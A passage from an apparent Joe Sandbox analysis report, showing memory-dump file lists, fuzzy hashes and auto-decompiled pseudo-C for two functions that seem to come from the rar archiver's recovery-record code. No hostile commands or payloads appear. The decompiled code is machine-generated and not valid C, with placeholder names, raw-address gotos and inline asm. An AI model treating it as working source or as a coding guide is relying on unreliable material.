                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: 343f6458ff87012717b0069df35cb459b4b4114e73208e39043c56ee4c8bbdb9
                                                                                                            • Instruction ID: 004b884e606047cff7195f23e44d6457b9f56d67e5033dd260431455bcddf00e
                                                                                                            • Opcode Fuzzy Hash: 343f6458ff87012717b0069df35cb459b4b4114e73208e39043c56ee4c8bbdb9
                                                                                                            • Instruction Fuzzy Hash: F4114C73F246029EFB108B70E4953AE33B0FB4576EF140529DA4AA6A98DF3DC148CB44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B522C4 Relevance: 4.5, Strings: 3, Instructions: 771COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00007FF67FF650B522C4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
				void* __rbp;
				signed int _t187;
				signed short _t189;
				void* _t246;
				void* _t247;
				signed int _t259;
				void* _t270;
				signed long long _t271;
				signed long long _t272;
				intOrPtr _t280;
				long long _t291;
				intOrPtr _t298;
				signed long long _t300;
				signed long long _t303;
				long long _t365;
				signed long long _t387;
				signed long long _t390;
				intOrPtr* _t393;
				void* _t395;
				void* _t396;
				void* _t398;
				signed long long _t399;
				void* _t419;
				void* _t420;
				void* _t422;
				void* _t424;
				void* _t426;
				void* _t428;

				_t415 = __r9;
				_t299 = __rbx;
				_t247 = __eflags;
				_t246 = __ebp;
				_t242 = __edi;
				_t209 = __ecx;
				_t270 = _t398;
				 *((long long*)(_t270 + 0x10)) = __rbx;
				 *((long long*)(_t270 + 0x18)) = __rsi;
				 *((long long*)(_t270 + 0x20)) = __rdi;
				_t4 = _t270 - 0xb238; // -43648
				_t396 = _t4;
				E00007FF67FF650B69CB0(0xb310, _t270, _t419, _t420);
				_t399 = _t398 - _t270;
				_t271 =  *0x50b978f0; // 0x27db226282f1
				_t272 = _t271 ^ _t399;
				 *(_t396 + 0xb200) = _t272;
				_t393 = __rcx;
				_t6 = _t399 + 0x40; // 0x7d0
				if (E00007FF67FF650B52238(__ecx, _t247, __rbx, __rcx, _t6, __rcx, __r8, _t428) != 3) goto 0x50b52877;
				_t8 = _t396 + 0x20; // -43616
				E00007FF67FF650B173C8(_t299, _t8,  *((intOrPtr*)(_t393 + 0x22d8)), _t393, _t426, _t424);
				r9d = 0;
				_t9 = _t415 + 2; // 0x2
				r8d = _t9;
				_t10 = _t396 + 0x20; // -43616
				if (E00007FF67FF650B4F1C8(_t209, __edi, _t272, _t393, _t10, __r9) == 0) goto 0x50b52868;
				E00007FF67FF650B164E4(0x68);
				E00007FF67FF650B1EB04(E00007FF67FF650B4F1C8(_t209, __edi, _t272, _t393, _t10, __r9), _t272, _t299, _t393, L"RR", _t393, _t396);
				r14d = 1;
				if (_t272 == 0) goto 0x50b527de;
				if ( *((char*)(_t393 + 0x7f90)) != 0) goto 0x50b527de;
				_t12 = _t396 - 0x30; // -43696
				E00007FF67FF650B48A20(_t272, _t12, L"RR");
				_t15 = _t396 - 0x30; // -43696
				E00007FF67FF650B48CC0(_t299, _t15,  *((intOrPtr*)(_t393 + 0x68a8)), _t393,  *((intOrPtr*)(_t393 + 0x68b0)), _t422);
				r8d = _t426 + 7;
				_t17 = _t396 + 0x8ff0; // -6800
				_t365 = _t17;
				_t18 = _t396 - 0x30; // -43696
				E00007FF67FF650B48B14(_t299, _t18, _t365, _t393, _t396,  *((intOrPtr*)(_t393 + 0x68b0)));
				_t19 = _t396 - 0x30; // -43696
				r13d = E00007FF67FF650B48A9C(_t19);
				_t20 = _t396 - 0x30; // -43696
				E00007FF67FF650B48AE4( *((char*)(_t393 + 0x7f90)), _t272, _t299, _t20);
				 *(_t399 + 0x50) = _t272;
				dil = r14b;
				_t22 = _t396 - 0x30; // -43696
				E00007FF67FF650B11534(_t22);
				E00007FF67FF650B164E4(0x6a);
				_t300 =  *((intOrPtr*)(_t393 + 0x7f68));
				 *(_t399 + 0x70) = _t300;
				 *(_t399 + 0x58) = _t300;
				r12d = 0;
				dil =  ~dil;
				asm("sbb ecx, ecx");
				if ( *((intOrPtr*)(_t393 + 0x7f84)) == 0) goto 0x50b52417;
				_t387 = _t300;
				 *((long long*)(_t399 + 0x78)) = _t272 + _t300;
				 *((long long*)(_t396 - 0x58)) = _t365;
				 *((long long*)(_t396 - 0x50)) = _t365;
				 *((long long*)(_t396 - 0x48)) = _t365;
				 *((long long*)(_t396 - 0x40)) = _t365;
				 *((char*)(_t396 - 0x38)) = 0;
				 *((long long*)(_t396 - 0x80)) = _t365;
				 *((long long*)(_t396 - 0x78)) = _t365;
				 *((long long*)(_t396 - 0x70)) = _t365;
				 *((long long*)(_t396 - 0x68)) = _t365;
				 *((char*)(_t396 - 0x60)) = 0;
				 *(_t399 + 0x30) = _t300;
				 *(_t399 + 0x28) = _t272;
				 *(_t399 + 0x20) = r13d;
				_t41 = _t396 - 0x80; // -43776
				_t42 = _t396 - 0x58; // -43736
				E00007FF67FF650B503E4(__ebx, _t242,  *((intOrPtr*)(_t393 + 0x7f84)), _t393, _t42, _t41, _t272 + _t300);
				_t43 = _t396 - 0x30; // -43696
				E00007FF67FF650B6C1A0(E00007FF67FF650B11344(_t272 + _t300, _t43), 0,  *((intOrPtr*)(_t396 - 0x30)), _t42,  *((intOrPtr*)(_t396 - 0x28)));
				r8d = 0;
				 *0x50b80550(_t395);
				E00007FF67FF650B164E4(0x69);
				E00007FF67FF650B52FB8(__ebx, _t300, _t393, _t42, 0x7fffffff);
				 *(_t399 + 0x48) =  *(_t399 + 0x48) & 0x00000000;
				if (_t300 <= 0) goto 0x50b525ad;
				E00007FF67FF650B5B008();
				E00007FF67FF650B52FB8(__ebx, _t300, _t393,  *(_t399 + 0x58) - _t300,  *(_t399 + 0x58));
				if (_t387 -  *((intOrPtr*)(_t396 - 0x50)) >= 0) goto 0x50b5253b;
				 *0x50b80550();
				if ( *((intOrPtr*)( *_t393 + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)(_t396 - 0x58)) + _t387 * 8)) < 0) goto 0x50b5253b;
				r8d = r14d;
				 *0x50b80550();
				_t280 =  *((intOrPtr*)( *((intOrPtr*)(_t396 - 0x80)) + _t387 * 4));
				 *(_t399 + 0x70) = _t300 - _t280;
				 *(_t399 + 0x48) =  *(_t399 + 0x48) + r14d;
				 *(_t399 + 0x20) = r14b;
				r8d = 0x200;
				_t68 = _t396 + 0x9000; // -6784
				E00007FF67FF650B50E54();
				_t330 =  *((intOrPtr*)(_t396 - 0x30)) + _t280;
				_t70 = _t396 + 0x9000; // -6784
				 *_t330 =  *( *((intOrPtr*)(_t396 - 0x30)) + _t280) ^  *(_t70 -  *((intOrPtr*)(_t396 - 0x30)) + _t280 + _t330);
				if (0 + r14d - 0x200 < 0) goto 0x50b52573;
				_t72 = _t422 + 1; // 0x1
				asm("inc ebp");
				r12d = r12d & _t72;
				if ( *(_t399 + 0x70) > 0) goto 0x50b524d1;
				r8d = 0x64;
				E00007FF67FF650B52FB8(__ebx,  *(_t399 + 0x70), _t393, _t68, _t70 -  *((intOrPtr*)(_t396 - 0x30)) + _t280);
				r8d = 0;
				 *0x50b80550();
				_t259 = r13d;
				if (_t259 == 0) goto 0x50b52635;
				r15d = 0x200;
				 *0x50b80550();
				_t336 = _t393 +  *((intOrPtr*)(_t396 - 0x30));
				_t83 = _t396 + 0x9000; // -6784
				 *_t336 =  *(_t393 +  *((intOrPtr*)(_t396 - 0x30))) ^  *(_t83 - _t393 +  *((intOrPtr*)(_t396 - 0x30)) + _t393 +  *((intOrPtr*)(_t396 - 0x30)));
				if (_t259 != 0) goto 0x50b5261b;
				if (0 + r14d - r13d < 0) goto 0x50b525ec;
				_t390 =  *(_t399 + 0x58);
				r8d = 0;
				 *0x50b80550();
				_t303 = _t390;
				 *(_t399 + 0x70) = _t303;
				r12d = 0;
				 *(_t399 + 0x48) =  *(_t399 + 0x48) & r12d;
				r15d = r15d | 0xffffffff;
				 *(_t399 + 0x4c) = r15d;
				 *(_t399 + 0x50) =  *(_t399 + 0x50) & r12d;
				_t93 = _t396 + 0x5a; // -43558
				_t94 = _t422 + 0x67; // 0x67
				E00007FF67FF650B111C0(_t94, _t93);
				E00007FF67FF650B52FB8(0 + r14d, _t303, _t393, _t93, 0x7fffffff);
				 *(_t399 + 0x68) =  *(_t399 + 0x68) & r12d;
				if (_t390 <= 0) goto 0x50b52e2d;
				E00007FF67FF650B5B008();
				E00007FF67FF650B52FB8(0 + r14d, _t303, _t393, _t390 - _t303, _t390);
				if (_t390 -  *((intOrPtr*)(_t396 - 0x50)) >= 0) goto 0x50b52702;
				 *0x50b80550();
				if ( *((intOrPtr*)( *_t393 + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)(_t396 - 0x58)) + _t390 * 8)) < 0) goto 0x50b52702;
				r8d = r14d;
				_t187 =  *0x50b80550();
				_t291 =  *((intOrPtr*)( *((intOrPtr*)(_t396 - 0x80)) + _t390 * 4));
				 *(_t399 + 0x70) = _t303 - _t291;
				 *(_t399 + 0x68) =  *(_t399 + 0x68) + r14d;
				 *(_t399 + 0x20) = r14b;
				_t114 = _t399 + 0x70; // 0x800
				r8d = 0x200;
				E00007FF67FF650B50E54();
				 *((long long*)(_t396 + 0x8ff0)) = _t291;
				r8d = _t187;
				_t117 = _t396 + 0x9000; // -6784
				_t118 = _t396 + 0x20; // -43616
				E00007FF67FF650B329C4(0x200, 0, _t246, _t291, _t303 - _t291, _t118, _t117, _t390);
				r8d = 0x200;
				_t119 = _t396 + 0x9000; // -6784
				_t189 = E00007FF67FF650B28538(0x200, _t94 | 0xffffffff, _t291, _t303 - _t291, _t118, _t119, _t390, _t393, _t390);
				 *0x50b80550();
				r8d = 0;
				 *0x50b80550();
				 *(_t399 + 0x44) = E00007FF67FF650B32138(_t393) & 0x000000ff;
				 *(_t399 + 0x44) =  *(_t399 + 0x44) + ((E00007FF67FF650B32138(_t393) & 0x000000ff) << 8);
				 *((long long*)(_t399 + 0x78)) =  *((long long*)(_t399 + 0x78)) + 2;
				r8d = 0;
				 *0x50b80550();
				if ( *(_t399 + 0x44) != (_t189 & 0x0000ffff)) goto 0x50b52b79;
				r9b = r14b;
				_t130 = _t399 + 0x4c; // 0x7dc
				E00007FF67FF650B52F0C(r15d, r12d,  *((intOrPtr*)( *_t393 + 0x28)),  *((intOrPtr*)( *_t393 + 0x28)), _t130, _t114);
				goto 0x50b52e01;
				r8d = 0;
				_t298 =  *((intOrPtr*)( *_t393 + 0x20));
				 *0x50b80550();
				E00007FF67FF650B1E9C4(0x78, _t298,  *((intOrPtr*)( *_t393 + 0x28)), _t393, _t393, _t396);
				if (_t298 == 0) goto 0x50b5282f;
				if ( *((char*)(_t393 + 0x7f90)) != 0) goto 0x50b5282f;
				r13d =  *(_t393 + 0x7bde) & 0x0000ffff;
				r15d =  *(_t393 + 0x7be0);
				dil = 0;
				goto 0x50b523d8;
				if ( *((char*)(_t399 + 0x40)) == 0) goto 0x50b528a7;
				if ( *((char*)(_t393 + 0x7f84)) == 0) goto 0x50b528a7;
				E00007FF67FF650B164E4(0x6b);
				_t139 = _t393 + 0x3a; // 0x3b
				E00007FF67FF650B2CC24(E00007FF67FF650B111C0(0x41, _t139), 0xa,  *((char*)(_t393 + 0x7f84)), 0x50ba7ab8);
				r14d = 0;
				_t140 = _t396 + 0x20; // -43616
				E00007FF67FF650B175D4( *((intOrPtr*)( *_t393 + 0x28)), _t140);
				return E00007FF67FF650B69D10(r14d, 0x41,  *(_t396 + 0xb200) ^ _t399);
			}































                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c4
                                                                                                            0x7ff650b522c7
                                                                                                            0x7ff650b522cb
                                                                                                            0x7ff650b522cf
                                                                                                            0x7ff650b522dc
                                                                                                            0x7ff650b522dc
                                                                                                            0x7ff650b522e8
                                                                                                            0x7ff650b522ed
                                                                                                            0x7ff650b522f0
                                                                                                            0x7ff650b522f7
                                                                                                            0x7ff650b522fa
                                                                                                            0x7ff650b52301
                                                                                                            0x7ff650b52304
                                                                                                            0x7ff650b52311
                                                                                                            0x7ff650b5231e
                                                                                                            0x7ff650b52322
                                                                                                            0x7ff650b52328
                                                                                                            0x7ff650b5232b
                                                                                                            0x7ff650b5232b
                                                                                                            0x7ff650b5232f
                                                                                                            0x7ff650b5233d
                                                                                                            0x7ff650b52348
                                                                                                            0x7ff650b52357
                                                                                                            0x7ff650b5235c
                                                                                                            0x7ff650b52365
                                                                                                            0x7ff650b52372
                                                                                                            0x7ff650b5237a
                                                                                                            0x7ff650b5237e
                                                                                                            0x7ff650b52392
                                                                                                            0x7ff650b52396
                                                                                                            0x7ff650b5239b
                                                                                                            0x7ff650b5239f
                                                                                                            0x7ff650b5239f
                                                                                                            0x7ff650b523a6
                                                                                                            0x7ff650b523aa
                                                                                                            0x7ff650b523af
                                                                                                            0x7ff650b523b8
                                                                                                            0x7ff650b523bb
                                                                                                            0x7ff650b523bf
                                                                                                            0x7ff650b523c7
                                                                                                            0x7ff650b523cc
                                                                                                            0x7ff650b523cf
                                                                                                            0x7ff650b523d3
                                                                                                            0x7ff650b523dd
                                                                                                            0x7ff650b523e2
                                                                                                            0x7ff650b523e9
                                                                                                            0x7ff650b523ee
                                                                                                            0x7ff650b523f5
                                                                                                            0x7ff650b523f8
                                                                                                            0x7ff650b523fb
                                                                                                            0x7ff650b52409
                                                                                                            0x7ff650b52419
                                                                                                            0x7ff650b5241f
                                                                                                            0x7ff650b52424
                                                                                                            0x7ff650b52428
                                                                                                            0x7ff650b5242c
                                                                                                            0x7ff650b52430
                                                                                                            0x7ff650b52434
                                                                                                            0x7ff650b52437
                                                                                                            0x7ff650b5243b
                                                                                                            0x7ff650b5243f
                                                                                                            0x7ff650b52443
                                                                                                            0x7ff650b52447
                                                                                                            0x7ff650b5244a
                                                                                                            0x7ff650b5244f
                                                                                                            0x7ff650b52454
                                                                                                            0x7ff650b5245c
                                                                                                            0x7ff650b52460
                                                                                                            0x7ff650b52467
                                                                                                            0x7ff650b52472
                                                                                                            0x7ff650b52486
                                                                                                            0x7ff650b5248e
                                                                                                            0x7ff650b5249a
                                                                                                            0x7ff650b524a5
                                                                                                            0x7ff650b524b9
                                                                                                            0x7ff650b524be
                                                                                                            0x7ff650b524c6
                                                                                                            0x7ff650b524d1
                                                                                                            0x7ff650b524e2
                                                                                                            0x7ff650b524ef
                                                                                                            0x7ff650b524fb
                                                                                                            0x7ff650b52509
                                                                                                            0x7ff650b52516
                                                                                                            0x7ff650b52520
                                                                                                            0x7ff650b5252a
                                                                                                            0x7ff650b52531
                                                                                                            0x7ff650b52536
                                                                                                            0x7ff650b5253b
                                                                                                            0x7ff650b52545
                                                                                                            0x7ff650b5254b
                                                                                                            0x7ff650b52555
                                                                                                            0x7ff650b52564
                                                                                                            0x7ff650b52569
                                                                                                            0x7ff650b52577
                                                                                                            0x7ff650b52585
                                                                                                            0x7ff650b52587
                                                                                                            0x7ff650b5258f
                                                                                                            0x7ff650b52592
                                                                                                            0x7ff650b5259d
                                                                                                            0x7ff650b525b2
                                                                                                            0x7ff650b525ba
                                                                                                            0x7ff650b525cb
                                                                                                            0x7ff650b525d5
                                                                                                            0x7ff650b525dd
                                                                                                            0x7ff650b525e0
                                                                                                            0x7ff650b525e6
                                                                                                            0x7ff650b52600
                                                                                                            0x7ff650b5260b
                                                                                                            0x7ff650b5260e
                                                                                                            0x7ff650b5261e
                                                                                                            0x7ff650b52626
                                                                                                            0x7ff650b5262e
                                                                                                            0x7ff650b52630
                                                                                                            0x7ff650b52638
                                                                                                            0x7ff650b52644
                                                                                                            0x7ff650b5264a
                                                                                                            0x7ff650b5264d
                                                                                                            0x7ff650b52652
                                                                                                            0x7ff650b52655
                                                                                                            0x7ff650b5265a
                                                                                                            0x7ff650b5265e
                                                                                                            0x7ff650b52663
                                                                                                            0x7ff650b52668
                                                                                                            0x7ff650b5266c
                                                                                                            0x7ff650b52671
                                                                                                            0x7ff650b52685
                                                                                                            0x7ff650b5268a
                                                                                                            0x7ff650b52692
                                                                                                            0x7ff650b52698
                                                                                                            0x7ff650b526a9
                                                                                                            0x7ff650b526b6
                                                                                                            0x7ff650b526c2
                                                                                                            0x7ff650b526d0
                                                                                                            0x7ff650b526dd
                                                                                                            0x7ff650b526e7
                                                                                                            0x7ff650b526f1
                                                                                                            0x7ff650b526f8
                                                                                                            0x7ff650b526fd
                                                                                                            0x7ff650b52702
                                                                                                            0x7ff650b52707
                                                                                                            0x7ff650b52711
                                                                                                            0x7ff650b5271e
                                                                                                            0x7ff650b52725
                                                                                                            0x7ff650b5272c
                                                                                                            0x7ff650b5272f
                                                                                                            0x7ff650b52736
                                                                                                            0x7ff650b5273a
                                                                                                            0x7ff650b5273f
                                                                                                            0x7ff650b52742
                                                                                                            0x7ff650b5274c
                                                                                                            0x7ff650b5275e
                                                                                                            0x7ff650b5276e
                                                                                                            0x7ff650b52779
                                                                                                            0x7ff650b5278a
                                                                                                            0x7ff650b5279c
                                                                                                            0x7ff650b527a0
                                                                                                            0x7ff650b527a9
                                                                                                            0x7ff650b527b6
                                                                                                            0x7ff650b527c0
                                                                                                            0x7ff650b527c6
                                                                                                            0x7ff650b527c9
                                                                                                            0x7ff650b527d4
                                                                                                            0x7ff650b527d9
                                                                                                            0x7ff650b527e1
                                                                                                            0x7ff650b527ee
                                                                                                            0x7ff650b527f2
                                                                                                            0x7ff650b52800
                                                                                                            0x7ff650b52808
                                                                                                            0x7ff650b52811
                                                                                                            0x7ff650b52813
                                                                                                            0x7ff650b5281b
                                                                                                            0x7ff650b52827
                                                                                                            0x7ff650b5282a
                                                                                                            0x7ff650b52834
                                                                                                            0x7ff650b5283d
                                                                                                            0x7ff650b52844
                                                                                                            0x7ff650b52849
                                                                                                            0x7ff650b52863
                                                                                                            0x7ff650b52868
                                                                                                            0x7ff650b5286b
                                                                                                            0x7ff650b5286f
                                                                                                            0x7ff650b528a6

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$Protect!$Protect+
                                                                                                            • API String ID: 0-830744985
                                                                                                            • Opcode ID: 3be71515139eca3ce3b94f001e1feac7906e2c90645621a99ca9b294b5c83112
                                                                                                            • Instruction ID: 5cc9a2560aa1c94056aec961dc53ed53db6abf32c576928ede3a1d420bc2ceaa
                                                                                                            • Opcode Fuzzy Hash: 3be71515139eca3ce3b94f001e1feac7906e2c90645621a99ca9b294b5c83112
                                                                                                            • Instruction Fuzzy Hash: FB720727A18A9296EB10CB29D4802BD7771FB96B84F084135DB8EA7BA6DF3DD145C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B11C7B Relevance: 3.7, Strings: 2, Instructions: 1193COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E00007FF67FF650B11C7B(void* __ebx, void* __rbx, void* __rdi, void* __rsi, long long __r9, signed int __r10, long long __r12, void* __r14) {
				void* _t521;
				void* _t522;
				void* _t523;
				void* _t533;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t537;
				void* _t554;
				void* _t568;
				void* _t578;
				intOrPtr _t606;
				void* _t612;
				void* _t655;
				void* _t663;
				void* _t673;
				void* _t685;
				signed int _t687;
				signed int _t695;
				signed int _t702;
				intOrPtr _t707;
				void* _t774;
				void* _t775;
				void* _t776;
				signed int _t865;
				signed long long _t952;
				unsigned long long _t955;
				unsigned long long _t956;
				intOrPtr _t957;
				intOrPtr _t960;
				long long _t962;
				long long _t963;
				unsigned long long _t971;
				intOrPtr _t983;
				intOrPtr _t987;
				signed int _t988;
				long long _t990;
				long long _t993;
				signed short* _t995;
				intOrPtr _t1002;
				long long _t1006;
				long long _t1008;
				intOrPtr _t1009;
				void* _t1014;
				long long _t1039;
				intOrPtr _t1043;
				intOrPtr* _t1045;
				intOrPtr _t1049;
				long long _t1059;
				signed long long _t1067;
				signed int* _t1070;
				intOrPtr* _t1079;
				intOrPtr _t1089;
				intOrPtr _t1100;
				signed long long _t1113;
				void* _t1145;
				intOrPtr* _t1178;
				intOrPtr _t1209;
				intOrPtr _t1250;
				unsigned long long _t1254;
				intOrPtr _t1266;
				void* _t1281;
				long long _t1285;
				long long _t1287;
				signed int _t1290;
				long long _t1292;
				void* _t1294;
				intOrPtr* _t1296;
				signed long long _t1298;
				intOrPtr _t1304;
				long long _t1320;
				intOrPtr _t1339;
				void* _t1347;
				long long _t1349;
				intOrPtr _t1356;
				intOrPtr _t1358;

				_t1348 = __r12;
				_t1345 = __r10;
				_t1294 = __rsi;
				_t685 = __ebx;
				_t952 =  *((intOrPtr*)(__rsi + 0x60));
				if ( *((intOrPtr*)(_t952 + 0x7167)) == r12b) goto 0x50b11c9b;
				_t522 = E00007FF67FF650B166E0(_t521, _t1298 + 0x70, __rbx);
				if ( *(_t952 + 0x2c) == 2) goto 0x50b11cae;
				_t523 = E00007FF67FF650B166E0(_t522, _t1298 + 0x70, __rbx);
				if ( *(_t952 + 0x2c) != r14d) goto 0x50b11cbf;
				_t1067 = _t1298 + 0x70;
				E00007FF67FF650B166E0(_t523, _t1067, __rbx);
				 *(_t952 + 0x2c) = r12d;
				_t1053 = __rbx + __r14;
				if (__rbx + __r14 -  *((intOrPtr*)(_t1296 - 0x68)) < 0) goto 0x50b11c7b;
				r14b =  *((long long*)(_t1296 + 0xb0b8)) != 0xffffffff;
				 *(_t1298 + 0x43) = r14b;
				_t1209 =  *((intOrPtr*)(__rsi + 0x60));
				r9d = 0x20000;
				if ( *((intOrPtr*)(_t1209 + 0x8516)) != r12w) goto 0x50b11d74;
				if (r14b == 0) goto 0x50b11d02;
				if ( *(_t1296 + 0x1302c) != r12b) goto 0x50b11d74;
				if ( *(_t1298 + 0x40) == r12b) goto 0x50b11d15;
				if ( *((intOrPtr*)(_t1209 + 0x71b9)) == r12b) goto 0x50b11d74;
				_t1280 =  !=  ?  *((void*)(_t1296 + 0xa090)) : __rdi;
				asm("dec eax");
				r10d = 0xe0000;
				if ( *(_t1209 + 0x10) - (_t952 & __r10) + __r9 <= 0) goto 0x50b11d74;
				_t1281 = ( !=  ?  *((void*)(_t1296 + 0xa090)) : __rdi) + ( !=  ?  *((void*)(_t1296 + 0xa090)) : __rdi);
				_t955 =  *(_t1209 + 0x10);
				if (_t955 - _t1281 <= 0) goto 0x50b11d74;
				_t956 = _t955 >> 1;
				 *(_t1209 + 0x10) = _t956;
				_t1304 =  *((intOrPtr*)(__rsi + 0x60));
				asm("dec eax");
				if ( *(_t1304 + 0x10) - (_t1067 & __r10) + __r9 > 0) goto 0x50b11d42;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 2) goto 0x50b11d8c;
				if ( *(_t1304 + 0x10) - _t956 <= 0) goto 0x50b11d8c;
				 *(_t1304 + 0x10) = _t956;
				_t957 =  *((intOrPtr*)(__rsi + 0x60));
				if ( *((intOrPtr*)(_t957 + 0x7144)) != r12d) goto 0x50b11da7;
				if ( *((intOrPtr*)(_t957 + 0x10)) - __r9 <= 0) goto 0x50b11da7;
				 *((long long*)(_t957 + 0x10)) = __r9;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b11dc3;
				_t1070 =  *((intOrPtr*)(__rsi + 0x60)) + 0x71cc;
				if ( *_t1070 == r12b) goto 0x50b11dc3;
				 *_t1070 = r12b;
				if ( *((intOrPtr*)(_t1296 + 0xa05c)) == r12b) goto 0x50b11ddf;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rsi + 0x60)) + 0x71ae)) != r12b) goto 0x50b11ddf;
				goto 0x50b11de7;
				r8d = 0;
				E00007FF67FF650B171DC(r12b, __rbx + __r14, _t1298 + 0x70, _t1304, _t1281, __rsi);
				_t960 =  *((intOrPtr*)(_t1294 + 0x60));
				if ( *((intOrPtr*)(_t960 + 0x71d0)) == r12d) goto 0x50b11e2b;
				if ( *((intOrPtr*)(_t1296 + 0xa058)) != 3) goto 0x50b11e2b;
				E00007FF67FF650B164E4(0x85);
				E00007FF67FF650B14AF0(0x85, _t960, _t1053, _t1294, _t1298 + 0x70, _t1304, __r10, _t1347);
				_t533 = E00007FF67FF650B164E4(0x86);
				 *((long long*)(_t1296 + 0xa090)) = __r12;
				if ( *((intOrPtr*)(_t1296 - 0x68)) - __r12 <= 0) goto 0x50b11ea9;
				_t534 = E00007FF67FF650B166E0(_t533, _t1298 + 0x70, __r12);
				if ( *((intOrPtr*)(_t960 + 0x2c)) == 2) goto 0x50b11e61;
				_t535 = E00007FF67FF650B166E0(_t534, _t1298 + 0x70, __r12);
				if ( *((intOrPtr*)(_t960 + 0x2c)) != 3) goto 0x50b11ea0;
				_t536 = E00007FF67FF650B166E0(_t535, _t1298 + 0x70, __r12);
				if ( *((long long*)(_t960 + 0x50)) != 0xffffffff) goto 0x50b11ea0;
				_t537 = E00007FF67FF650B166E0(_t536, _t1298 + 0x70, __r12);
				if ( *((intOrPtr*)(_t960 + 0x58)) != r12b) goto 0x50b11ea0;
				E00007FF67FF650B166E0(_t537, _t1298 + 0x70, __r12);
				 *((intOrPtr*)(_t1296 + 0xa090)) =  *((intOrPtr*)(_t1296 + 0xa090)) +  *((intOrPtr*)(_t960 + 8));
				if (__r12 + _t1281 -  *((intOrPtr*)(_t1296 - 0x68)) < 0) goto 0x50b11e3b;
				_t1079 =  *((intOrPtr*)(_t1294 + 0x68));
				if (_t1079 == 0) goto 0x50b11ec0;
				_t962 =  *((intOrPtr*)( *_t1079));
				 *0x50b80550();
				if (r14b == 0) goto 0x50b11ef3;
				if ( *((intOrPtr*)(_t1296 + 0x13028)) == 3) goto 0x50b11f00;
				E00007FF67FF650B69B58(_t962, _t1079);
				 *((long long*)(_t1298 + 0x68)) = _t962;
				if (_t962 == 0) goto 0x50b11f2a;
				E00007FF67FF650B3D1F8(_t962, __r12 + _t1281, _t962, _t1294 + 0x178);
				goto 0x50b11f2d;
				_t963 =  *((intOrPtr*)(_t1294 + 0x60));
				if ( *((intOrPtr*)(_t963 + 0x71c8)) == r12b) goto 0x50b11ece;
				E00007FF67FF650B69B58(_t963, _t962);
				 *((long long*)(_t1298 + 0x68)) = _t963;
				if (_t963 == 0) goto 0x50b11f25;
				E00007FF67FF650B38D08(_t963, __r12 + _t1281, _t963, _t1294 + 0x178);
				goto 0x50b11f28;
				goto 0x50b11f2d;
				 *((long long*)(_t1294 + 0x68)) = __r12;
				r14d = 0xe980;
				if ( *((intOrPtr*)(_t1294 + 0x70)) == 0) goto 0x50b11f53;
